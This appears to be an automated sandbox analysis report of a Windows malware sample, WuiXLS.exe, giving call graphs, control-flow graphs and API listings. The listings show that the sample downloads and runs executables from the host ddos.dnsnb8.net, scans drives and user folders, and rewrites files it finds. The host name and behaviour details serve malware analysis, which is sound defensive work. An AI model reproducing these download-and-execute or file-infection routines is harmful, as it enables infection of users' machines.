1144->1141 1147 702b35 lstrcmpiA 1145->1147 1148 7028b8 174 API calls 1145->1148 1146->1143 1147->1145 1147->1146 1148->1142 1150 702905 1149->1150 1151 702951 memset 1149->1151 1150->1151 1152 702956 strrchr 1150->1152 1153 70291b memset wsprintfA 1150->1153 1151->1142 1152->1151 1155 702967 lstrcmpiA 1152->1155 1154 7029e2 180 API calls 1153->1154 1154->1151 1156 702988 lstrcmpiA 1155->1156 1157 70297a 1155->1157 1156->1151 1160 702994 1156->1160 1167 701e6e 1157->1167 1159 7029ad strstr 1162 7029d3 1159->1162 1163 7029cb 1159->1163 1160->1159 1161 7029a5 lstrcpy 1160->1161 1161->1159 1232 702692 1162->1232 1210 70239d strstr 1163->1210 1168 701e7d 1167->1168 1241 701df6 strrchr 1168->1241 1171 701eb0 SetFileAttributesA CreateFileA 1172 702332 1171->1172 1173 701edf 1171->1173 1175 702346 1172->1175 1176 70233d UnmapViewOfFile 1172->1176 1246 701915 1173->1246 1177 702350 1175->1177 1178 70234b FindCloseChangeNotification 1175->1178 1176->1175 1180 702391 1177->1180 1181 702356 CloseHandle 1177->1181 1178->1177 1180->1151 1181->1180 1182 701f2e 1182->1172 1252 701c81 1182->1252 1186 701f92 1187 701c81 2 API calls 1186->1187 1188 701f9f 1187->1188 1188->1172 1189 701af9 169 API calls 1188->1189 1190 702024 1188->1190 1194 701fc0 1189->1194 1190->1172 1191 701af9 169 API calls 1190->1191 1192 70207a 1191->1192 1193 701af9 169 API calls 1192->1193 1198 702090 1193->1198 1194->1172 1194->1190 1195 701af9 169 API calls 1194->1195 1196 701ffe 1195->1196 1197 702013 FlushViewOfFile 1196->1197 1197->1190 1199 7020bb memset memset 1198->1199 1200 7020f5 1199->1200 1201 701c81 2 API calls 1200->1201 1202 7021de 1201->1202 1203 702226 memcpy UnmapViewOfFile FindCloseChangeNotification 1202->1203 1257 701b8a 1203->1257 1205 70226e 1265 70185b GetSystemTimeAsFileTime srand rand srand rand 1205->1265 1207 7022ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1208 701915 3 API calls 1207->1208 1209 70231f CloseHandle 1208->1209 1209->1172 1211 702451 CreateFileA GetFileSize 1210->1211 1218 7023d8 1210->1218 1212 702675 CloseHandle 1211->1212 1213 702480 1211->1213 1214 70267c RemoveDirectoryA 1212->1214 1213->1212 1215 702499 1213->1215 1216 702687 1214->1216 1217 701915 3 API calls 1215->1217 1216->1151 1219 7024a4 9 API calls 1217->1219 1218->1211 1218->1216 1267 70189d memset CreateProcessA 1219->1267 1222 70255c Sleep memset wsprintfA 1223 7029e2 163 API calls 1222->1223 1224 702597 memset wsprintfA Sleep 1223->1224 1225 70189d 6 API calls 1224->1225 1226 7025e4 Sleep CreateFileA 1225->1226 1227 701915 3 API calls 1226->1227 1228 702610 CloseHandle 1227->1228 1228->1214 1229 70261e 1228->1229 1229->1214 1230 702641 SetFilePointer WriteFile 1229->1230 1230->1214 1231 702667 SetEndOfFile 1230->1231 1231->1214 1233 7026b2 WaitForSingleObject 1232->1233 1234 7026a2 CreateEventA 1232->1234 1235 7026c1 lstrlen ??2@YAPAXI 1233->1235 1236 702708 1233->1236 1234->1233 1237 702736 SetEvent 1235->1237 1238 7026da lstrcpy 1235->1238 1236->1237 1239 702718 lstrcpy ??3@YAXPAX 1236->1239 1237->1151 1240 7026f1 1238->1240 1239->1240 1240->1237 1242 701e62 1241->1242 1243 701e13 lstrcpy strrchr 1241->1243 1242->1171 1242->1172 1243->1242 1244 701e40 lstrcmpiA 1243->1244 1244->1242 1245 701e52 lstrlen 1244->1245 1245->1242 1245->1244 1247 701924 SetFilePointer CreateFileMappingA MapViewOfFile 1246->1247 1248 701928 1246->1248 1247->1172 1247->1182 1249 70192e memset GetFileTime 1248->1249 1250 70194f 1248->1250 1249->1247 1250->1247 1251 701954 SetFileTime 1250->1251 1251->1247 1253 701c9c 1252->1253 1255 701c94 1252->1255 1254 701cae memset memset 1253->1254 1253->1255 1254->1255 1255->1172 1256 70185b GetSystemTimeAsFileTime srand rand srand rand 1255->1256 1256->1186 1258 701b93 1257->1258 1266 70185b GetSystemTimeAsFileTime srand rand srand rand 1258->1266 1260 701bca srand 1261 701bd8 rand 1260->1261 1262 701c08 1261->1262 1262->1261 1263 701c29 memset memcpy lstrcat 1262->1263 1263->1205 1265->1207 1266->1260 1268 7018e0 CloseHandle WaitForSingleObject 1267->1268 1269 70190c 1267->1269 1270 701907 CloseHandle 1268->1270 1271 7018fb GetExitCodeProcess 1268->1271 1269->1214 1269->1222 1270->1269 1271->1270 1281 70185b GetSystemTimeAsFileTime srand rand srand rand 1272->1281 1274 7027b5 wsprintfA CopyFileA 1275 702840 1274->1275 1276 7027de wsprintfA 1274->1276 1275->1133 1277 701973 17 API calls 1276->1277 1278 70280f 1277->1278 1279 702820 CreateFileA 1278->1279 1280 702813 DeleteFileA 1278->1280 1279->1275 1280->1279 1281->1274 1283 701200 CloseHandle 1282->1283 1284 7011c6 AdjustTokenPrivileges 1282->1284 1283->1068 1285 7011f6 1284->1285 1286 7011f7 CloseHandle 1284->1286 1285->1286 1286->1283 1288 701310 1287->1288 1289 70123f GetCurrentProcessId OpenProcess 1287->1289 1288->1066 1296 701319 1288->1296 1289->1288 1293 701262 1289->1293 1290 7012b0 VirtualAlloc 1290->1293 1295 7012b8 1290->1295 1291 7012f1 CloseHandle 1291->1288 1292 701302 VirtualFree 1291->1292 1292->1288 1293->1290 1293->1291 1294 701296 VirtualFree 1293->1294 1293->1295 1294->1290 1295->1291 1297 70134a 1296->1297 1298 70132a GetModuleHandleA GetProcAddress 1296->1298 1299 701351 memset 1297->1299 1300 701363 1297->1300 1298->1297 1298->1300 1299->1300 1300->1066 1300->1075 1301->1088 1303 701196 1302->1303 1304 7010ba 1302->1304 1304->1303 1311 70185b GetSystemTimeAsFileTime srand rand srand rand 1304->1311 1306 701118 wsprintfA wsprintfA URLDownloadToFileA 1307 701168 lstrlen Sleep 1306->1307 1308 7010dc 1306->1308 1307->1304 1312 701000 CreateFileA 1308->1312 1311->1306 1313 701092 WinExec lstrlen 1312->1313 1314 701025 GetFileSize CreateFileMappingA MapViewOfFile 1312->1314 1313->1303 1313->1304 1315 70107b 1314->1315 1319 701057 1314->1319 1317 701087 CloseHandle 1315->1317 1318 70108d CloseHandle 1315->1318 1316 701074 UnmapViewOfFile 1316->1315 1317->1318 1318->1313 1319->1316 1347 702361 1348 702374 1347->1348 1349 70236b UnmapViewOfFile 1347->1349 1350 702382 1348->1350 1351 702379 CloseHandle 1348->1351 1349->1348 1352 702388 CloseHandle 1350->1352 1353 702391 1350->1353 1351->1350 1352->1353 1354 706014 1355 70605f 1354->1355 1356 706035 GetModuleHandleA 1354->1356 1357 70604d GetProcAddress 1356->1357 1358 706058 1357->1358 1358->1355 1358->1357 1358->1358 1321 706076 1322 70607b 1321->1322 1326 7060c7 1321->1326 1324 7060b0 VirtualAlloc 1322->1324 1322->1326 1333 7061b2 1322->1333 1323 70615f VirtualFree 1323->1326 1324->1326 1325 706198 VirtualFree 1325->1333 1326->1323 1326->1325 1327 7060d5 VirtualAlloc 1326->1327 1327->1326 1328 706389 VirtualProtect 1331 7063b7 1328->1331 1329 7063fc VirtualProtect 1330 706400 1329->1330 1331->1329 1332 7063e7 VirtualProtect 1331->1332 1332->1329 1332->1331 1333->1328 1334 7062fb 1333->1334 1335 706159 VirtualFree 1343 7060c7 1335->1343 1336 706198 VirtualFree 1345 7061b2 1336->1345 1337 7060d5 VirtualAlloc 1337->1343 1338 706389 VirtualProtect 1342 7063b7 1338->1342 1339 7063fc VirtualProtect 1340 706400 1339->1340 1341 70615f VirtualFree 1341->1343 1342->1339 1344 7063e7 VirtualProtect 1342->1344 1343->1336 1343->1337 1343->1341 1344->1339 1344->1342 1345->1338 1346 7062fb 1345->1346

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00702CF0 1 Function_00706CF2 5 Function_00706CF8 1->5 2 Function_00701973 17 Function_0070185B 2->17 3 Function_00706076 21 Function_007066C8 3->21 4 Function_00701DF6 6 Function_00701AF9 27 Function_00701638 6->27 7 Function_00702B7D 11 Function_007029E2 7->11 8 Function_00702D60 9 Function_007014E1 9->6 9->27 10 Function_00702361 37 Function_00702D9B 10->37 26 Function_007028B8 11->26 12 Function_00706B63 23 Function_007069B0 12->23 24 Function_00706834 12->24 28 Function_007067A4 12->28 13 Function_00701C68 14 Function_00701E6E 14->4 14->6 14->8 14->13 14->17 33 Function_00701915 14->33 14->37 45 Function_00701C81 14->45 49 Function_00701D8A 14->49 50 Function_00701B8A 14->50 15 Function_007017D0 16 Function_00706159 16->21 18 Function_0070235D 19 Function_00702845 22 Function_0070274A 19->22 30 Function_00702692 19->30 38 Function_0070239D 19->38 20 Function_00702C48 20->2 52 Function_00702B8C 20->52 43 Function_00706D00 21->43 47 Function_00706B02 21->47 48 Function_00706A84 21->48 22->2 22->17 25 Function_00706734 25->43 25->47 25->48 26->11 26->14 26->30 26->38 27->15 27->20 34 Function_00701718 27->34 35 Function_00701099 27->35 41 Function_0070139F 27->41 46 Function_00701581 27->46 29 Function_007065A6 31 Function_00706012 32 Function_00706014 34->0 35->17 42 Function_00701000 35->42 36 Function_00701319 38->11 38->33 39 Function_0070189D 38->39 40 Function_0070119F 41->36 41->40 53 Function_0070120E 41->53 42->15 43->1 43->12 43->23 44 Function_00706001 51 Function_0070600A 44->51 46->17 47->12 48->1 54 Function_0070680F 48->54 50->17 52->7 52->19

                                          Executed Functions

                                          Function 007029E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 101 7029e2-702a34 memset wsprintfA 102 702a3a-702a86 memset lstrlen lstrcpyn strrchr 101->102 103 702abc-702b21 memset * 2 FindFirstFileA call 7028b8 memset 101->103 102->103 105 702a88-702a98 102->105 108 702b61-702b6b FindNextFileA 103->108 105->103 107 702a9a-702aa7 lstrcmpiA 105->107 109 702b74-702b7a 107->109 110 702aad-702aba lstrlen 107->110 111 702b23-702b2a 108->111 112 702b6d-702b6e FindClose 108->112 110->103 110->107 113 702b4c-702b5c call 7028b8 111->113 114 702b2c-702b33 111->114 112->109 113->108 114->113 115 702b35-702b4a lstrcmpiA 114->115 115->112 115->113
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                          • String ID: %s*$C:\$Documents and Settings
                                          • API String ID: 2826467728-110786608
                                          • Opcode ID: 54d5d33a78fd6b2dbb0184cb34dc5ae1ec941c097939f298b13a365dbe82e152
                                          • Instruction ID: 6d0ba62460ddf2ecdf65b0b4db7d8cfc61defcf15850017bb39b3e12f9a1f05c
                                          • Opcode Fuzzy Hash: 54d5d33a78fd6b2dbb0184cb34dc5ae1ec941c097939f298b13a365dbe82e152
                                          • Instruction Fuzzy Hash: 3A4152B3405349EFD721DBA0DC4DDDB77ECEB84315F044A2AF944C2152EA38D64987A6
                                          Function 00701099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74stringsleepprocessCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 172 701099-7010b4 173 701199-70119c 172->173 174 7010ba-7010c7 172->174 175 7010c8-7010d4 174->175 176 701184-701190 175->176 177 7010da 175->177 176->175 179 701196-701198 176->179 178 701113-701162 call 70185b wsprintfA * 2 URLDownloadToFileA 177->178 182 701168-701182 lstrlen Sleep 178->182 183 7010dc-70110d call 701000 WinExec lstrlen 178->183 179->173 182->176 182->178 183->178 183->179
                                          APIs
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • WinExec.KERNEL32(?,00000005), ref: 007010F1
                                          • lstrlen.KERNEL32(00704748), ref: 007010FA
                                          • wsprintfA.USER32 ref: 0070112A
                                          • wsprintfA.USER32 ref: 00701143
                                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0070115B
                                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00701169
                                          • Sleep.KERNEL32 ref: 00701179
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGp$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 1280626985-378087252
                                          • Opcode ID: 89871567087833f914b5a8883468c6877a1052b054711eca064c9dee4d805260
                                          • Instruction ID: ada5f21aaa57950f5279c9a254f1ce46a14f41be0fb6f02d9db1f54a25f5e290
                                          • Opcode Fuzzy Hash: 89871567087833f914b5a8883468c6877a1052b054711eca064c9dee4d805260
                                          • Instruction Fuzzy Hash: 852141B5901208FADB10DBA0DC49FAEBBFDAB05315F518365E600A2091DB7C5B84CF64
                                          Function 00701718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 205 701718-701733 GetSystemTimeAsFileTime 206 701754-701758 205->206 207 701735-701752 SHSetValueA 205->207 208 7017c6-7017cd 206->208 209 70175a-701784 SHGetValueA 206->209 207->208 209->208 210 701786-7017b3 call 702cf0 * 2 209->210 210->208 215 7017b5 210->215 216 7017b7-7017bd 215->216 217 7017bf 215->217 216->208 216->217 217->208
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701729
                                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0070174C
                                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0070177C
                                          • __aulldiv.LIBCMT ref: 00701796
                                          • __aulldiv.LIBCMT ref: 007017A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: TimeValue__aulldiv$FileSystem
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$SOFTWARE\GTplus$Time
                                          • API String ID: 541852442-378230927
                                          • Opcode ID: 1c349b4f9a32ae62ecb139c22294d73a7fc981c40907816bf11e454e65536f17
                                          • Instruction ID: a580d07444a5c55c437e27dabd4f14449c78e2bd43295c3cfbaf0677d707b96d
                                          • Opcode Fuzzy Hash: 1c349b4f9a32ae62ecb139c22294d73a7fc981c40907816bf11e454e65536f17
                                          • Instruction Fuzzy Hash: 221146B6A00209FBEB109B94CC89FEF7BFCEB44B14F508215FA01B61C1D6799A44CB64
                                          Function 00706076 Relevance: 11.1, APIs: 7, Instructions: 616memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 218 706076-706079 219 7060e0-7060eb 218->219 220 70607b-706080 218->220 223 7060ee-7060f4 219->223 221 706082-706085 220->221 222 7060f7-7060f8 220->222 224 7060f6 221->224 225 706087 221->225 226 7060fa-7060fc call 7066c8 222->226 227 7060fe-706106 222->227 223->224 224->222 225->223 228 706089-706095 225->228 226->227 230 706155-706189 VirtualFree 227->230 231 706108-70611d 227->231 233 7060a1-7060aa 228->233 234 706097-70609f 228->234 240 70618c-706192 230->240 232 70611f-706121 231->232 236 706151-706154 232->236 237 706123 232->237 238 7060b0-7060c1 VirtualAlloc 233->238 239 7061ba-7061c8 233->239 234->233 236->230 237->236 243 706125-706128 237->243 244 7060c7-7060cf 238->244 241 706243-706251 239->241 242 7061ca-7061d7 239->242 240->244 245 706198-7061b0 VirtualFree 240->245 250 706253 241->250 251 706264-70626f 241->251 246 7061dd-7061e0 242->246 247 706134-70613b 243->247 248 70612a-70612e 243->248 244->240 249 7060d5-7060df VirtualAlloc 244->249 245->239 252 7061b2-7061b4 245->252 246->241 254 7061e2-7061f2 246->254 261 706130-706132 247->261 262 70613d-70614f 247->262 248->247 248->261 249->219 257 706255-706258 250->257 253 706271-706276 251->253 252->239 258 706389-7063b1 VirtualProtect 253->258 259 70627c-706289 253->259 260 7061f5-7061fe 254->260 257->251 263 70625a-706262 257->263 266 7063b7-7063ba 258->266 274 706292-706298 259->274 275 70628b 259->275 264 706200-706203 260->264 265 70620c-706219 260->265 261->232 262->232 263->257 268 706205-706208 264->268 269 70621b-706228 264->269 270 706238-70623f 265->270 271 7063fc-7063ff VirtualProtect 266->271 272 7063bc-7063c2 266->272 276 70622a-706236 268->276 277 70620a 268->277 269->270 270->260 279 706241 270->279 273 706400-706416 271->273 272->272 278 7063c4 272->278 280 706420-706425 273->280 281 706418-70641d 273->281 282 7062a2-7062ac 274->282 275->274 276->270 277->270 278->271 283 7063c6-7063cf 278->283 279->246 284 7062b1-7062c8 282->284 285 7062ae 282->285 286 7063d1 283->286 287 7063d4-7063d8 283->287 288 706373-706384 284->288 289 7062ce-7062d4 284->289 285->284 286->287 290 7063da 287->290 291 7063dd-7063e1 287->291 288->253 294 7062d6-7062d9 289->294 295 7062da-7062f1 289->295 290->291 292 7063e3 291->292 293 7063e7-7063fa VirtualProtect 291->293 292->293 293->266 293->271 294->295 297 7062f3-7062f9 295->297 298 706365-70636e 295->298 299 706314-706326 297->299 300 7062fb-70630f 297->300 298->282 302 706328-70634a 299->302 303 70634c-706360 299->303 301 706426-7064a9 300->301 313 706519-70651c 301->313 314 7064ab-7064c0 301->314 302->298 303->301 315 706583-706587 313->315 316 70651d-70651e 313->316 320 7064c2 314->320 321 706535-706537 314->321 318 706588-70658b 315->318 319 706522-706533 316->319 322 7065a1-7065a3 318->322 323 70658d-70658f 318->323 319->321 326 7064c5-7064cd 320->326 327 7064f8 320->327 324 706539 321->324 325 70659a 321->325 328 706591-706593 323->328 329 7065b4 324->329 330 70653b-706541 324->330 331 70659b-70659d 325->331 332 706542-706545 326->332 333 7064cf-7064d4 326->333 334 7064fa-7064fe 327->334 335 70656c-70656f 327->335 328->331 336 706595 328->336 341 7065be-7065db 329->341 330->332 331->328 337 70659f 331->337 338 70654d-706550 332->338 339 7064d6-7064d9 333->339 340 706517-706518 333->340 342 706500 334->342 343 706572 334->343 335->343 336->325 337->318 338->341 346 706552-706556 338->346 339->338 347 7064db-7064f5 339->347 340->313 348 7065dd-7065f6 341->348 342->319 344 706502 342->344 345 706573-706576 343->345 344->345 350 706504-706513 344->350 351 706578-70657a 345->351 346->351 352 706558-706569 346->352 347->327 349 7065f7-706608 348->349 350->321 353 706515 350->353 351->348 354 70657c 351->354 352->335 353->340 354->349 355 70657e-70657f 354->355 355->315
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 007060BE
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 007060DF
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00706189
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007061A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: e94ffecb875d58df5d0cc90198889298c88680d6f519af059b9fb671a4c27547
                                          • Instruction ID: 07f79b80a43e884d73c551560e9f98f7c6263a2a68814b04f44720fd630cfb0f
                                          • Opcode Fuzzy Hash: e94ffecb875d58df5d0cc90198889298c88680d6f519af059b9fb671a4c27547
                                          • Instruction Fuzzy Hash: A71212B2508785DFDB328F24CC65BEA7BE0EF02310F18469DE9858B1D3D678A921C751
                                          Function 00702B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 356 702b8c-702bc6 memset GetLogicalDriveStringsA 357 702bc8-702bcc 356->357 358 702c09-702c28 WaitForMultipleObjects 356->358 361 702bfa-702c07 lstrlen 357->361 362 702bce-702bd0 357->362 359 702c2a-702c3a CreateThread 358->359 360 702c3c-702c45 358->360 359->360 361->357 361->358 362->361 363 702bd2-702bdc GetDriveTypeA 362->363 363->361 364 702bde-702be1 363->364 364->361 365 702be3-702bf6 CreateThread 364->365 365->361
                                          APIs
                                          • memset.MSVCRT ref: 00702BA6
                                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00702BB4
                                          • GetDriveTypeA.KERNELBASE(?), ref: 00702BD3
                                          • CreateThread.KERNELBASE(00000000,00000000,00702B7D,?,00000000,00000000), ref: 00702BEE
                                          • lstrlen.KERNEL32(?), ref: 00702BFB
                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00702C16
                                          • CreateThread.KERNEL32(00000000,00000000,00702845,00000000,00000000,00000000), ref: 00702C3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                          • String ID:
                                          • API String ID: 1073171358-0
                                          • Opcode ID: 2f419bda6c505a2e42530f0a325f080098158e47c3fce256de95382b7116b2a4
                                          • Instruction ID: 1c668139b55c9ef094bb9bd4a712753be7de710985984c3a492a38fa0c428c9d
                                          • Opcode Fuzzy Hash: 2f419bda6c505a2e42530f0a325f080098158e47c3fce256de95382b7116b2a4
                                          • Instruction Fuzzy Hash: 182193F280015CEFE7209F649C88DAF7BADFB45344B144325F95692192EB688D07CB65
                                          Function 00701E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 701e6e-701e95 call 702d60 3 701e97 call 701d8a 0->3 4 701e9c-701eaa call 701df6 0->4 3->4 8 701eb0-701ed9 SetFileAttributesA CreateFileA 4->8 9 702332 4->9 8->9 10 701edf-701f28 call 701915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 702338-70233b 9->11 10->9 20 701f2e-701f39 10->20 13 702346-702349 11->13 14 70233d-702340 UnmapViewOfFile 11->14 15 702350-702354 13->15 16 70234b-70234e FindCloseChangeNotification 13->16 14->13 18 702391-70239a call 702d9b 15->18 19 702356-70235b CloseHandle 15->19 16->15 19->18 20->9 22 701f3f-701f56 20->22 22->9 23 701f5c-701f64 22->23 23->9 25 701f6a-701f70 23->25 25->9 26 701f76-701f87 call 701c81 25->26 26->9 29 701f8d-701fa7 call 70185b call 701c81 26->29 29->9 34 701fad-701fb4 29->34 35 702024-702045 34->35 36 701fb6-701fc5 call 701af9 34->36 35->9 37 70204b-70204e 35->37 36->35 44 701fc7-701fd2 36->44 39 702070-7020f4 call 701af9 * 2 call 701c68 * 2 memset * 2 37->39 40 702050-702053 37->40 62 7020f5-7020fe 39->62 42 702056-70205a 40->42 42->39 45 70205c-702061 42->45 44->9 47 701fd8-701fe7 44->47 45->9 51 702067-70206e 45->51 49 701fe9-701fec 47->49 50 701fef-702006 call 701af9 47->50 49->50 57 702013-70201e FlushViewOfFile 50->57 58 702008-70200e call 701c68 50->58 51->42 57->35 58->57 63 702130-702139 62->63 64 702100-702114 62->64 67 70213c-702142 63->67 65 702116-70212a 64->65 66 70212d-70212e 64->66 65->66 66->62 68 702144-702150 67->68 69 70215c 67->69 71 702152-702154 68->71 72 702157-70215a 68->72 70 70215f-702162 69->70 73 702181-702184 70->73 74 702164-702171 70->74 71->72 72->67 77 702186 73->77 78 70218d-7021ba call 701c68 73->78 75 702177-70217e 74->75 76 70232a-70232d 74->76 75->73 76->70 77->78 81 7021d3-70220b call 701c81 call 701c68 78->81 82 7021bc-7021d0 call 701c68 78->82 89 70221b-70221e 81->89 90 70220d-702218 call 701c68 81->90 82->81 92 702220-702223 89->92 93 702226-70231a memcpy UnmapViewOfFile FindCloseChangeNotification call 701b8a call 70185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 701915 89->93 90->89 92->93 100 70231f-702328 CloseHandle 93->100 100->11
                                          APIs
                                          • SetFileAttributesA.KERNELBASE(?,00000080,?,007032B0,00000164,00702986,?), ref: 00701EB9
                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00701ECD
                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00701EF3
                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00701F07
                                          • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 00701F1D
                                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0070201E
                                          • memset.MSVCRT ref: 007020D8
                                          • memset.MSVCRT ref: 007020EA
                                          • memcpy.MSVCRT ref: 0070222D
                                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00702238
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0070224A
                                          • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022C6
                                          • SetEndOfFile.KERNELBASE(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022CB
                                          • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022DD
                                          • WriteFile.KERNELBASE(000000FF,00704008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 007022F7
                                          • WriteFile.KERNELBASE(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0070230D
                                          • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00702322
                                          • UnmapViewOfFile.KERNEL32(?,?,007032B0,00000164,00702986,?), ref: 00702340
